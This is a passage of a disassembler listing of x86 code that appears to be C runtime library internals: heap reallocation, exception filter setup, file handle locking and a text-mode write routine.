jz short loc_431D23
mov [ebp+var_24], ebx
jmp short loc_431D5B
; ---------------------------------------------------------------------------
loc_431D23: ; CODE XREF: sub_431C83+99�j
push esi
call sub_42CC4E
pop ecx
mov [ebp+var_24], eax
cmp eax, edi
jz short loc_431D5B
mov eax, [ebx-4]
dec eax
mov [ebp+var_20], eax
cmp eax, esi
jb short loc_431D3E
mov eax, esi
loc_431D3E: ; CODE XREF: sub_431C83+B7�j
push eax
push ebx
push [ebp+var_24]
call sub_429420
push ebx
call sub_42C8FA
mov [ebp+var_28], eax
push ebx
push eax
call sub_42C925
add esp, 18h
loc_431D5B: ; CODE XREF: sub_431C83+8A�j
; sub_431C83+9E�j ...
cmp [ebp+var_24], edi
jnz short loc_431DAB
cmp esi, edi
jnz short loc_431D6A
push 1
pop esi
mov [ebp+arg_4], esi
loc_431D6A: ; CODE XREF: sub_431C83+DF�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push dword_677000
call dword_437210 ; RtlAllocateHeap
mov [ebp+var_24], eax
cmp eax, edi
jz short loc_431DAB
mov eax, [ebx-4]
dec eax
mov [ebp+var_20], eax
cmp eax, esi
jb short loc_431D95
mov eax, esi
loc_431D95: ; CODE XREF: sub_431C83+10E�j
push eax
push ebx
push [ebp+var_24]
call sub_429420
push ebx
push [ebp+var_28]
call sub_42C925
add esp, 14h
loc_431DAB: ; CODE XREF: sub_431C83+7E�j
; sub_431C83+DB�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_431E0E
cmp [ebp+var_28], edi
jnz short loc_431DDB
cmp esi, edi
jnz short loc_431DC0
push 1
pop esi
loc_431DC0: ; CODE XREF: sub_431C83+138�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push edi
push dword_677000
call dword_437160 ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_431DDB: ; CODE XREF: sub_431C83+61�j
; sub_431C83+134�j
mov eax, [ebp+var_24]
cmp eax, edi
jnz loc_431FA3
cmp dword_676930, edi
jz loc_431FA3
push esi
call sub_42C6C5
pop ecx
test eax, eax
jnz loc_431CDE
jmp loc_431FA1
sub_431C83 endp
; =============== S U B R O U T I N E =======================================
sub_431E06 proc near ; DATA XREF: .text:00437740�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
xor edi, edi
sub_431E06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431E0E proc near ; CODE XREF: sub_431C83+12C�p
push 9
call sub_42DB50
pop ecx
retn
sub_431E0E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431C83
loc_431E17: ; CODE XREF: sub_431C83+55�j
cmp eax, 2
jnz loc_431F67
cmp esi, 0FFFFFFE0h
ja short loc_431E37
cmp esi, edi
jbe short loc_431E31
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_431E34
; ---------------------------------------------------------------------------
loc_431E31: ; CODE XREF: sub_431C83+1A4�j
push 10h
pop esi
loc_431E34: ; CODE XREF: sub_431C83+1AC�j
mov [ebp+arg_4], esi
loc_431E37: ; CODE XREF: sub_431C83+1A0�j
; sub_431C83+2CB�j
mov [ebp+var_24], edi
cmp esi, 0FFFFFFE0h
ja loc_431F36
push 9
call sub_42DAEF
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_38]
push eax
push ebx
call sub_42D655
add esp, 0Ch
mov edi, eax
mov [ebp+var_30], edi
test edi, edi
jz loc_431F1A
cmp esi, dword_453174
jnb short loc_431ED4
mov ebx, esi
shr ebx, 4
push ebx
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_42DA1D
add esp, 10h
test eax, eax
jz short loc_431E99
mov eax, [ebp+arg_0]
mov [ebp+var_24], eax
jmp short loc_431ED1
; ---------------------------------------------------------------------------
loc_431E99: ; CODE XREF: sub_431C83+20C�j
push ebx
call sub_42D6F1
pop ecx
mov [ebp+var_24], eax
test eax, eax
jz short loc_431ED1
movzx eax, byte ptr [edi]
shl eax, 4
mov [ebp+var_34], eax
cmp eax, esi
jb short loc_431EB6
mov eax, esi
loc_431EB6: ; CODE XREF: sub_431C83+22F�j
push eax
push [ebp+arg_0]
push [ebp+var_24]
call sub_429420
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_42D6AC
add esp, 18h
loc_431ED1: ; CODE XREF: sub_431C83+214�j
; sub_431C83+222�j
mov ebx, [ebp+arg_0]
loc_431ED4: ; CODE XREF: sub_431C83+1F3�j
cmp [ebp+var_24], 0
jnz short loc_431F2D
push esi
push 0
push dword_677000
call dword_437210 ; RtlAllocateHeap
mov [ebp+var_24], eax
test eax, eax
jz short loc_431F2D
movzx eax, byte ptr [edi]
shl eax, 4
mov [ebp+var_34], eax
cmp eax, esi
jb short loc_431EFF
mov eax, esi
loc_431EFF: ; CODE XREF: sub_431C83+278�j
push eax
push ebx
push [ebp+var_24]
call sub_429420
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_42D6AC
add esp, 18h
jmp short loc_431F2D
; ---------------------------------------------------------------------------
loc_431F1A: ; CODE XREF: sub_431C83+1E7�j
push esi
push ebx
push 0
push dword_677000
call dword_437160 ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_431F2D: ; CODE XREF: sub_431C83+255�j
; sub_431C83+26B�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_431F5C
loc_431F36: ; CODE XREF: sub_431C83+1BA�j
mov eax, [ebp+var_24]
cmp eax, edi
jnz short loc_431FA3
cmp dword_676930, edi
jz short loc_431FA3
push esi
call sub_42C6C5
pop ecx
test eax, eax
jnz loc_431E37
jmp short loc_431FA1
; END OF FUNCTION CHUNK FOR sub_431C83
; =============== S U B R O U T I N E =======================================
sub_431F56 proc near ; DATA XREF: .text:0043774C�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_431F56 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431F5C proc near ; CODE XREF: sub_431C83+2AE�p
push 9
call sub_42DB50
pop ecx
xor edi, edi
retn
sub_431F5C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431C83
loc_431F67: ; CODE XREF: sub_431C83+197�j
; sub_431C83+31C�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_431F8A
cmp esi, edi
jnz short loc_431F75
push 1
pop esi
loc_431F75: ; CODE XREF: sub_431C83+2ED�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push edi
push dword_677000
call dword_437160 ; RtlReAllocateHeap
loc_431F8A: ; CODE XREF: sub_431C83+2E9�j
cmp eax, edi
jnz short loc_431FA3
cmp dword_676930, edi
jz short loc_431FA3
push esi
call sub_42C6C5
pop ecx
test eax, eax
jnz short loc_431F67
loc_431FA1: ; CODE XREF: sub_431C83+48�j
; sub_431C83+17E�j ...
xor eax, eax
loc_431FA3: ; CODE XREF: sub_431C83+35�j
; sub_431C83+15D�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_431C83
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431FB2 proc near ; CODE XREF: sub_42B7EB+C�p
; sub_42B7EB+2A�p
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00432025 SIZE 0000006F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437750
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, dword_677004
cmp eax, 3
jnz short loc_432025
push 9
call sub_42DAEF
pop ecx
and [ebp+var_4], 0
mov esi, [ebp+arg_0]
push esi
call sub_42C8FA
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_432007
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_43200A
; ---------------------------------------------------------------------------
loc_432007: ; CODE XREF: sub_431FB2+48�j
mov esi, [ebp+var_20]
loc_43200A: ; CODE XREF: sub_431FB2+53�j
or [ebp+var_4], 0FFFFFFFFh
call sub_43201C
cmp [ebp+var_1C], 0
jmp short loc_43206E
sub_431FB2 endp
; =============== S U B R O U T I N E =======================================
sub_432019 proc near ; DATA XREF: .text:00437758�o
mov esi, [ebp-20h]
sub_432019 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43201C proc near ; CODE XREF: sub_431FB2+5C�p
push 9
call sub_42DB50
pop ecx
retn
sub_43201C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431FB2
loc_432025: ; CODE XREF: sub_431FB2+2B�j
cmp eax, 2
jnz short loc_432070
push 9
call sub_42DAEF
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_0]
call sub_42D655
add esp, 0Ch
mov [ebp+var_28], eax
test eax, eax
jz short loc_43205E
movzx esi, byte ptr [eax]
shl esi, 4
mov [ebp+var_20], esi
jmp short loc_432061
; ---------------------------------------------------------------------------
loc_43205E: ; CODE XREF: sub_431FB2+9F�j
mov esi, [ebp+var_20]
loc_432061: ; CODE XREF: sub_431FB2+AA�j
or [ebp+var_4], 0FFFFFFFFh
call sub_432097
cmp [ebp+var_28], 0
loc_43206E: ; CODE XREF: sub_431FB2+65�j
jnz short loc_432083
loc_432070: ; CODE XREF: sub_431FB2+76�j
push [ebp+arg_0]
push 0
push dword_677000
call dword_4371E4 ; RtlSizeHeap
mov esi, eax
loc_432083: ; CODE XREF: sub_431FB2:loc_43206E�j
mov eax, esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_431FB2
; =============== S U B R O U T I N E =======================================
sub_432094 proc near ; DATA XREF: .text:00437764�o
mov esi, [ebp-20h]
sub_432094 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_432097 proc near ; CODE XREF: sub_431FB2+B3�p
push 9
call sub_42DB50
pop ecx
retn
sub_432097 endp
; =============== S U B R O U T I N E =======================================
sub_4320A0 proc near ; DATA XREF: sub_4320E6�o
; .text:00450E90�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4320C3
cmp dword ptr [eax+10h], 3
jnz short loc_4320C3
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4320C3
jmp sub_431BCC
; ---------------------------------------------------------------------------
loc_4320C3: ; CODE XREF: sub_4320A0+D�j
; sub_4320A0+13�j ...
mov eax, dword_676A14
test eax, eax
jz short loc_4320E0
push eax
call sub_434CFF
test eax, eax
pop ecx
jz short loc_4320E0
push esi
call dword_676A14
jmp short loc_4320E2
; ---------------------------------------------------------------------------
loc_4320E0: ; CODE XREF: sub_4320A0+2A�j
; sub_4320A0+35�j
xor eax, eax
loc_4320E2: ; CODE XREF: sub_4320A0+3E�j
pop esi
retn 4
sub_4320A0 endp
; =============== S U B R O U T I N E =======================================
sub_4320E6 proc near ; DATA XREF: .text:0043A024�o
push offset sub_4320A0
call dword_4371E0 ; SetUnhandledExceptionFilter
mov dword_676A14, eax
retn
sub_4320E6 endp
; =============== S U B R O U T I N E =======================================
sub_4320F7 proc near ; DATA XREF: .text:0043A03C�o
push dword_676A14
call dword_4371E0 ; SetUnhandledExceptionFilter
retn
sub_4320F7 endp
; =============== S U B R O U T I N E =======================================
sub_432104 proc near ; CODE XREF: sub_42BEB8+11�p
; sub_42C0DC+E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_433237
test eax, eax
pop ecx
jz short loc_43218D
cmp esi, offset dword_450EE0
jnz short loc_432122
xor eax, eax
jmp short loc_43212D
; ---------------------------------------------------------------------------
loc_432122: ; CODE XREF: sub_432104+18�j
cmp esi, offset dword_450F00
jnz short loc_43218D
push 1
pop eax
loc_43212D: ; CODE XREF: sub_432104+1C�j
inc dword_676920
test word ptr [esi+0Ch], 10Ch
jnz short loc_43218D
cmp dword_676A18[eax*4], 0
push ebx
push edi
lea edi, ds:676A18h[eax*4]
mov ebx, 1000h
jnz short loc_432173
push ebx
call sub_4297B8
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_432173
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_432180
; ---------------------------------------------------------------------------
loc_432173: ; CODE XREF: sub_432104+4D�j
; sub_432104+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_432180: ; CODE XREF: sub_432104+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_43218D: ; CODE XREF: sub_432104+10�j
; sub_432104+24�j ...
xor eax, eax
pop esi
retn
sub_432104 endp
; =============== S U B R O U T I N E =======================================
sub_432191 proc near ; CODE XREF: sub_42BEB8+2B�p
; sub_42C0DC+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_4321B9
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_4321B9
push esi
call sub_42F2D9
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_4321B9: ; CODE XREF: sub_432191+6�j
; sub_432191+10�j
pop esi
retn
sub_432191 endp
; =============== S U B R O U T I N E =======================================
sub_4321BB proc near ; CODE XREF: sub_4336B9:loc_433831�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebx
push ebp
push esi
push edi
push 12h
or edi, 0FFFFFFFFh
call sub_42DAEF
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov ebp, offset dword_676EE0
loc_4321DB: ; CODE XREF: sub_4321BB+BC�j
mov esi, [ebp+0]
test esi, esi
jz loc_43227F
lea eax, [esi+480h]
loc_4321EC: ; CODE XREF: sub_4321BB+8A�j
cmp esi, eax
jnb short loc_432264
test byte ptr [esi+4], 1
jnz short loc_43223A
cmp dword ptr [esi+8], 0
jnz short loc_43221F
push 11h
call sub_42DAEF
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_432217
lea eax, [esi+0Ch]
push eax
call dword_437158 ; InitializeCriticalSection
inc dword ptr [esi+8]
loc_432217: ; CODE XREF: sub_4321BB+4D�j
push 11h
call sub_42DB50
pop ecx
loc_43221F: ; CODE XREF: sub_4321BB+3F�j
lea ebx, [esi+0Ch]
push ebx
call dword_4370CC ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_432247
push ebx
call dword_437164 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_43223A: ; CODE XREF: sub_4321BB+39�j
mov eax, [ebp+0]
add esi, 24h
add eax, 480h
jmp short loc_4321EC
; ---------------------------------------------------------------------------
loc_432247: ; CODE XREF: sub_4321BB+72�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [ebp+0]
push 24h
pop ecx
cdq
idiv ecx
mov edi, eax
add edi, [esp+18h+var_4]
cmp edi, 0FFFFFFFFh
jnz short loc_4322CD
mov ebx, [esp+18h+var_8]
loc_432264: ; CODE XREF: sub_4321BB+33�j
add [esp+18h+var_4], 20h
add ebp, 4
inc ebx
cmp ebp, offset dword_676FE0
mov [esp+18h+var_8], ebx
jl loc_4321DB
jmp short loc_4322CD
; ---------------------------------------------------------------------------
loc_43227F: ; CODE XREF: sub_4321BB+25�j
mov esi, 480h
push esi
call sub_4297B8
test eax, eax
pop ecx
jz short loc_4322CD
add dword_676FE0, 20h
lea ecx, ds:676EE0h[ebx*4]
lea edx, [eax+480h]
mov [ecx], eax
loc_4322A5: ; CODE XREF: sub_4321BB+104�j
cmp eax, edx
jnb short loc_4322C1
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
jmp short loc_4322A5
; ---------------------------------------------------------------------------
loc_4322C1: ; CODE XREF: sub_4321BB+EC�j
shl ebx, 5
mov edi, ebx
push edi
call sub_43241B
pop ecx
loc_4322CD: ; CODE XREF: sub_4321BB+A3�j
; sub_4321BB+C2�j ...
push 12h
call sub_42DB50
pop ecx
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4321BB endp
; =============== S U B R O U T I N E =======================================
sub_4322DE proc near ; CODE XREF: sub_4336B9+1FD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_676FE0
push edi
jnb short loc_432341
mov eax, ecx
sar eax, 5
lea edi, ds:676EE0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [eax+esi], 0FFFFFFFFh
jnz short loc_432341
cmp dword_451144, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_432337
sub ecx, 0
jz short loc_43232E
dec ecx
jz short loc_432329
dec ecx
jnz short loc_432337
push ebx
push 0FFFFFFF4h
jmp short loc_432331
; ---------------------------------------------------------------------------
loc_432329: ; CODE XREF: sub_4322DE+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_432331
; ---------------------------------------------------------------------------
loc_43232E: ; CODE XREF: sub_4322DE+3E�j
push ebx
push 0FFFFFFF6h
loc_432331: ; CODE XREF: sub_4322DE+49�j
; sub_4322DE+4E�j
call dword_4371DC ; SetStdHandle
loc_432337: ; CODE XREF: sub_4322DE+39�j
; sub_4322DE+44�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_432357
; ---------------------------------------------------------------------------
loc_432341: ; CODE XREF: sub_4322DE+C�j
; sub_4322DE+2B�j
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_432357: ; CODE XREF: sub_4322DE+61�j
pop edi
pop esi
retn
sub_4322DE endp
; =============== S U B R O U T I N E =======================================
sub_43235A proc near ; CODE XREF: sub_42F1FD+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_676FE0
push edi
jnb short loc_4323C0
mov eax, ecx
sar eax, 5
lea edi, ds:676EE0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_4323C0
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4323C0
cmp dword_451144, 1
jnz short loc_4323B6
xor eax, eax
sub ecx, eax
jz short loc_4323AD
dec ecx
jz short loc_4323A8
dec ecx
jnz short loc_4323B6
push eax
push 0FFFFFFF4h
jmp short loc_4323B0
; ---------------------------------------------------------------------------
loc_4323A8: ; CODE XREF: sub_43235A+44�j
push eax
push 0FFFFFFF5h
jmp short loc_4323B0
; ---------------------------------------------------------------------------
loc_4323AD: ; CODE XREF: sub_43235A+41�j
push eax
push 0FFFFFFF6h
loc_4323B0: ; CODE XREF: sub_43235A+4C�j
; sub_43235A+51�j
call dword_4371DC ; SetStdHandle
loc_4323B6: ; CODE XREF: sub_43235A+3B�j
; sub_43235A+47�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_4323D6
; ---------------------------------------------------------------------------
loc_4323C0: ; CODE XREF: sub_43235A+C�j
; sub_43235A+2D�j ...
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_4323D6: ; CODE XREF: sub_43235A+64�j
pop edi
pop esi
retn
sub_43235A endp
; =============== S U B R O U T I N E =======================================
sub_4323D9 proc near ; CODE XREF: sub_42F1FD+7�p
; sub_42F1FD+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_676FE0
jnb short loc_432404
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_676EE0[ecx*4]
test byte ptr [ecx+eax*4+4], 1
lea eax, [ecx+eax*4]
jz short loc_432404
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_432404: ; CODE XREF: sub_4323D9+A�j
; sub_4323D9+26�j
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_4323D9 endp
; =============== S U B R O U T I N E =======================================
sub_43241B proc near ; CODE XREF: sub_42BEF9+6�p
; sub_42F1A0+2A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov ecx, eax
and eax, 1Fh
sar ecx, 5
push esi
push edi
mov esi, dword_676EE0[ecx*4]
lea ebx, ds:676EE0h[ecx*4]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_432469
push 11h
call sub_42DAEF
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_432461
lea eax, [esi+0Ch]
push eax
call dword_437158 ; InitializeCriticalSection
inc dword ptr [esi+8]
loc_432461: ; CODE XREF: sub_43241B+37�j
push 11h
call sub_42DB50
pop ecx
loc_432469: ; CODE XREF: sub_43241B+29�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call dword_4370CC ; RtlEnterCriticalSection
pop edi
pop esi
pop ebx
retn
sub_43241B endp
; =============== S U B R O U T I N E =======================================
sub_43247A proc near ; CODE XREF: sub_42BEF9+80�p
; sub_42F1A0+38�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_676EE0[ecx*4]
lea eax, [ecx+eax*4+0Ch]
push eax
call dword_437164 ; RtlLeaveCriticalSection
retn
sub_43247A endp
; =============== S U B R O U T I N E =======================================
sub_43249C proc near ; CODE XREF: sub_42C3E2+A2�p
; sub_42DB65+95�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FE0
jnb short loc_4324E9
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EE0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_4324E9
push edi
push esi
call sub_43241B
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_432501
push esi
mov edi, eax
call sub_43247A
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4324E9: ; CODE XREF: sub_43249C+B�j
; sub_43249C+26�j
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_43249C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432501 proc near ; CODE XREF: sub_42BEF9+22�p
; sub_42BEF9+2E�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_432521
loc_43251A: ; CODE XREF: sub_432501+169�j
xor eax, eax
jmp loc_432687
; ---------------------------------------------------------------------------
loc_432521: ; CODE XREF: sub_432501+17�j
mov eax, [ebp+arg_0]
sar eax, 5
lea ebx, ds:676EE0h[eax*4]
mov eax, [ebp+arg_0]
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_432551
push 2
push edi
push [ebp+arg_0]
call sub_42F91D
add esp, 0Ch
loc_432551: ; CODE XREF: sub_432501+40�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_432620
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_43265B
loc_432571: ; CODE XREF: sub_432501+E4�j
lea eax, [ebp+var_414]
loc_432577: ; CODE XREF: sub_432501+A8�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_4325AB
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_432596
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_432596: ; CODE XREF: sub_432501+8C�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_432577
loc_4325AB: ; CODE XREF: sub_432501+7F�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_437078 ; WriteFile
test eax, eax
jz short loc_432615
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_4325E7
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_432571
loc_4325E7: ; CODE XREF: sub_432501+D9�j
; sub_432501+11D�j
xor edi, edi
loc_4325E9: ; CODE XREF: sub_432501+13F�j
; sub_432501+14A�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_432684
cmp [ebp+arg_0], edi
jz short loc_43265B
push 5
pop esi
cmp [ebp+arg_0], esi
jnz short loc_43264D
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
mov [eax], esi
jmp short loc_432656
; ---------------------------------------------------------------------------
loc_432615: ; CODE XREF: sub_432501+CF�j
call dword_437170 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_4325E7
; ---------------------------------------------------------------------------
loc_432620: ; CODE XREF: sub_432501+58�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_437078 ; WriteFile
test eax, eax
jz short loc_432642
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_4325E9
; ---------------------------------------------------------------------------
loc_432642: ; CODE XREF: sub_432501+134�j
call dword_437170 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_4325E9
; ---------------------------------------------------------------------------
loc_43264D: ; CODE XREF: sub_432501+FE�j
push [ebp+arg_0]
call sub_42F0A6
pop ecx
loc_432656: ; CODE XREF: sub_432501+112�j
; sub_432501+181�j
or eax, 0FFFFFFFFh
jmp short loc_432687
; ---------------------------------------------------------------------------
loc_43265B: ; CODE XREF: sub_432501+6A�j
; sub_432501+F6�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_432670
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_43251A
loc_432670: ; CODE XREF: sub_432501+161�j
call sub_42F119
mov dword ptr [eax], 1Ch
call sub_42F122
mov [eax], edi
jmp short loc_432656
; ---------------------------------------------------------------------------
loc_432684: ; CODE XREF: sub_432501+ED�j
sub eax, [ebp+var_10]
loc_432687: ; CODE XREF: sub_432501+1B�j
; sub_432501+158�j
pop edi
pop esi
pop ebx
leave
retn
sub_432501 endp
; =============== S U B R O U T I N E =======================================
sub_43268C proc near ; CODE XREF: sub_4326BD+4�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42C1D4
dec dword ptr [esi+4]
pop ecx
js short loc_4326A8
mov eax, [esi]
movzx edi, byte ptr [eax]
inc eax
mov [esi], eax
jmp short loc_4326B1
; ---------------------------------------------------------------------------
loc_4326A8: ; CODE XREF: sub_43268C+10�j
push esi
call sub_42F3E2
pop ecx
mov edi, eax
loc_4326B1: ; CODE XREF: sub_43268C+1A�j
push esi
call sub_42C226
pop ecx
mov eax, edi
pop edi
pop esi
retn
sub_43268C endp
; =============== S U B R O U T I N E =======================================
sub_4326BD proc near ; CODE XREF: sub_42BF84+5�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_43268C
pop ecx
retn
sub_4326BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4326C8 proc near ; CODE XREF: sub_432AA0+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push 19h
call sub_42DAEF
push [ebp+arg_0]
call sub_432875 ; GetOEMCP
mov ebx, eax
pop ecx
cmp ebx, dword_676C9C
pop ecx
mov [ebp+arg_0], ebx
jnz short loc_4326F6
loc_4326EF: ; CODE XREF: sub_4326C8+196�j
xor esi, esi
jmp loc_432866
; ---------------------------------------------------------------------------
loc_4326F6: ; CODE XREF: sub_4326C8+25�j
test ebx, ebx
jz loc_432854
xor edx, edx
